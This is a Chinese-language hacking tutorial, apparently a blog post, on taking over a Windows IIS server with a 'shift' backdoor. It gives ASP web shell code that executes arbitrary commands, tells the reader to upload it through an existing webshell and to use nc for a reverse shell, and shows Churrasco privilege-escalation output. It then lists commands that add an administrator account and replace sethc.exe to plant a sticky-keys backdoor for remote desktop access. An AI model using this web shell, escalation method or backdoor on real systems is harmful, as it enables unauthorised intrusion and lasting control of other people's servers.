提权工具如下:cmd.exe Churrasco.exe nc.exe

提权前提:Wscript组件成功开启

如果Wscript组件被关闭,则使用以下方法开启:

源代码:

<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>

<%if err then%>

<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>

<%

end if %>

<form method="post">

<input type=text name="cmdx" size=60 value="C:\RECYCLER\cmd.exe"><br>

<input type=text name="cmd" size=60><br>

<input type=submit value="net user"></form>

<textarea readonly cols=80 rows=20>

<%On Error Resume Next

if request("cmdx")="C:\RECYCLER\cmd.exe" then

response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall

end if

response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall

%>

</textarea>

将源代码保存为1.asp并上传到webshell里,IE访问1.asp,如没有出错等就说明可以执行CMD命令!

下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现/churrasco/-->Current User: NETWORK SERVICE

/churrasco/-->Getting Rpcss PID ...

/churrasco/-->Found Rpcss PID: 696

/churrasco/-->Searching for Rpcss threads ...

/churrasco/-->Found Thread: 444

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 700

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 704

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 712

/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0xf24

/churrasco/-->Getting SYSTEM token from Rpcss Service...

/churrasco/-->Found szywjs Token

/churrasco/-->Found SYSTEM token 0xf1c

/churrasco/-->Running command with SYSTEM Token...

直到这里 没有出现命令执行成功 那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了!

在反弹回来的CMDSHELL里执行 C:\RECYCLER\Churrasco.exe "net user iisuser iisuser /add”
  C:\RECYCLER\Churrasco.exe "net localgroup
administrators iisuser /add"
  C:\RECYCLER\Churrasco.exe 这里是你所传到的目录!这样可以说90%的出现命令执行成功!这样就可以进行3389连接了!
  如果说这时没有出现命令执行成功 下面我就再告诉你一种方法!
  如下 依次执行:
  attrib c:\windows\system32\sethc.exe -h -r -s
  attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
  del c:\windows\system32\sethc.exe
  copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
  copy c:\windows\system32\sethc.exe
c:\windows\system32\dllcache\sethc.exe
  attrib c:\windows\system32\sethc.exe +h +r +s
  attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
  如果出现拒绝等错误 那就没法了!如果说这台服务器先是被别人拿过了做了shift后门 那么就是100%成功!本人亲自    用这方法成功替换过别人带有密码的SHIFT后门!
  还有一点就是在webSHELL里或CMDSHELL下也可以这样执行!
  C:\RECYCLER\Churrasco.exe "copy
d:\windows\explorer.exe d:\windows\system32\sethc.exe"
  C:\RECYCLER\Churrasco.exe "copy
d:\windows\system32\sethc.exe d:\windows\system32\dllcache\sethc.exe "
  还有就是attrib 加属性等也可以这样执行!还有一点忘了就是在反弹回来的CMDSHELL里用这种方法也可以!
  这样就可以利用SHIft后门成功拿下服务器了。

SHIFT后门拿服务器之方法总结的更多相关文章

  1. linux下维护服务器之常用命令

    linux下维护服务器之常用命令! 第1套如下: 正则表达式: 1.如何不要文件中的空白行和注释语句: [root@localhost ~]# grep -v '^$' 文件名 |grep -v '^ ...

  2. backup服务器之rsync服务

    backup服务器之rsync服务   rsync是开源的.快速的.多功能的可实现全量及增量的本地或远程数据同步备份的优秀工具.它拥有scp.cp的全量复制功能,同时比scp.cp命令更优秀.更强大. ...

  3. 实现jquery.ajax及原生的XMLHttpRequest跨域调用WCF服务的方法

    关于ajax跨域调用WCF服务的方法很多,经过我反复的代码测试,认为如下方法是最为简便的,当然也不能说别人的方法是错误的,下面就来上代码,WCF服务定义还是延用上次的,如: namespace Wcf ...

  4. 实现jquery.ajax及原生的XMLHttpRequest调用WCF服务的方法

    废话不多说,直接讲解实现步骤 一.首先我们需定义支持WEB HTTP方法调用的WCF服务契约及实现服务契约类(重点关注各attribute),代码如下: //IAddService.cs namesp ...

  5. Web服务器之iis,apache,tomcat三者之间的比较

    IIS-Apache-Tomcat的区别 IIS与Tomcat的区别 IIS是微软公司的Web服务器.主要支持ASP语言环境. Tomcat是Java Servlet 2.2和JavaServer P ...

  6. WebService服务调用方法介绍

    1 背景概述 由于在项目中需要多次调用webservice服务,本文主要总结了一下java调用WebService常见的6种方式,即:四种框架的五种调用方法以及使用AEAI ESB进行调用的方法. 2 ...

  7. linux服务器之LVS、Nginx和HAProxy负载均衡器对比

    linux服务器之LVS.Nginx和HAProxy负载均衡器对比. LVS特点:  1.抗负载能力强,使用IP负载均衡技术,只做分发,所以LVS本身并没有多少流量产生:  2.稳定性.可靠性好,自身 ...

  8. Windows Server 2003开机自动启动MySQL服务设置方法

    Windows Server 2003开机自动启动MySQL服务设置方法 发布时间:2014-12-19 更新时间:2014-12-24 来源:网络 作者:eaglezhong 关键词: 2003 e ...

  9. 【转】Android 服务器之SFTP服务器上传下载功能

    原文网址:http://blog.csdn.net/tanghua0809/article/details/47056327 本文主要是讲解Android服务器之SFTP服务器的上传下载功能,也是对之 ...

随机推荐

  1. JSP 中的 tag 文件

    在jsp文件中,可以引用 tag 和tld 文件,本文主要针对 tag 对于tag 文件 1)将此类文件放在 WEB-INF 下,比如 /WEB-INF/tags,tags 是目录,其下可以有多个.t ...

  2. The prefix "tx" for element "tx:annotation-driven " is not bound

    The prefix "tx" for element "tx:advice" is not bound 这个错误的原因很简单是: 我们在定义申明AOP的时候. ...

  3. 系统间通信(9)——通信管理与RMI 下篇

    接上文<架构设计:系统间通信(8)--通信管理与RMI 上篇>.之前说过,JDK中的RMI框架在JDK1.1.JDK1.2.JDK1.5.JDK1.6+几个版本中做了较大的调整.以下我们讨 ...

  4. C# 公历转农历

    /// <summary>     /// LunDay 的摘要说明.     /// 用法说明     /// 直接调用即可,比较简单     /// </summary> ...

  5. Event&Condition pyton

    Event 一个线程需要根据另外一个线程的状态来确定自己的下一步操作,需要调用threading库中Event对象:Event包含一个可由线程设置的信号标志,在初始情况下,event对象的标志位为假( ...

  6. python调用模块&函数

    一般模块是抽象的概念,按照功能划分模块,尽可能保证每个模块互相独立. 一般模块里有多个函数.当然,如果你愿意,也可以把一个几个模块写进一个大函数.对于python 模块,每个模块可以包含多个函数,但一 ...

  7. oracle11g 拆分字符串的详细技巧

    转自:http://m.blog.csdn.net/article/details?id=51946573 <-->功能需求                 有一个比较长的SQL语句,查询 ...

  8. Leetcode 160. Intersection of two linked lists

    Write a program to find the node at which the intersection of two singly linked lists begins. For ex ...

  9. 分区还原工具(DiskGenius)

    不小心删除的分区可以实用DiskGenius进行还原. 下载地址:http://www.upantool.com/qidong/2012/DiskGenius_3.7.1.html 操作方法: 打开D ...

  10. Discuz! X upgrade/converter GETSHELL Vulnerability Via /convert/include/global.func.php Inject Special Symbol Into /convert/data/config.inc.php

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 对于PHP应用来说,处于用户的输入并正确划定"数据-代码"边界 ...